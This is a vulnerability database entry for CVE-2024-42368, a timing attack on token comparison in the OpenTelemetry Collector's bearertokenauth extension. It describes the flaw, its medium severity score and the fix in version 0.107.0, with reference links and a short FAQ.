Vulnerability Description
OpenTelemetry, also known as OTel, is a vendor-neutral open source Observability framework for instrumenting, generating, collecting, and exporting telemetry data such as traces, metrics, and logs. The bearertokenauth extension's server authenticator performs a simple, non-constant time string comparison of the received & configured bearer tokens. This impacts anyone using the `bearertokenauth` server authenticator. Malicious clients with network access to the collector may perform a timing attack against a collector with this authenticator to guess the configured token, by iteratively sending tokens and comparing the response time. This would allow an attacker to introduce fabricated or bad data into the collector's telemetry pipeline. The observable timing vulnerability was fixed by using constant-time comparison in 0.107.0
CVSS Score
MEDIUM
Related Weaknesses (CWE)
References
- https://github.com/open-telemetry/opentelemetry-collector-contrib/commit/c9bd3ef
- https://github.com/open-telemetry/opentelemetry-collector-contrib/pull/34516
- https://github.com/open-telemetry/opentelemetry-collector-contrib/security/advis
FAQ
What is CVE-2024-42368?
CVE-2024-42368 is a vulnerability with a CVSS score of 6.5 (MEDIUM). OpenTelemetry, also known as OTel, is a vendor-neutral open source Observability framework for instrumenting, generating, collecting, and exporting telemetry data such as traces, metrics, and logs. Th...
How severe is CVE-2024-42368?
CVE-2024-42368 has been rated MEDIUM with a CVSS base score of 6.5/10. Review the CVSS metrics above for detailed severity breakdown.
Is there a patch for CVE-2024-42368?
Check the references section above for vendor advisories and patch information. Review vendor security bulletins for remediation guidance.